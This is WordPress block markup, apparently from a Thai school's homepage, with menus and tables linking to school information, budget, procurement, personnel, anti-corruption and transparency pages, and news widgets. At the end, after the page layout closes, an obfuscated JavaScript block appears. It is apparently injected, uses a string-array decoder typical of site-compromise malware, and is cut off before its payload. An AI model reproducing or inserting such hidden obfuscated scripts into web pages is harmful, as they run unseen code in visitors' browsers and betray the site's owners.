{\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 